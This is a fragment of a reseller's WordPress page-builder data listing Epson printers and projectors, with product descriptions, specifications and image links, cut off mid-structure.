apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-100\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 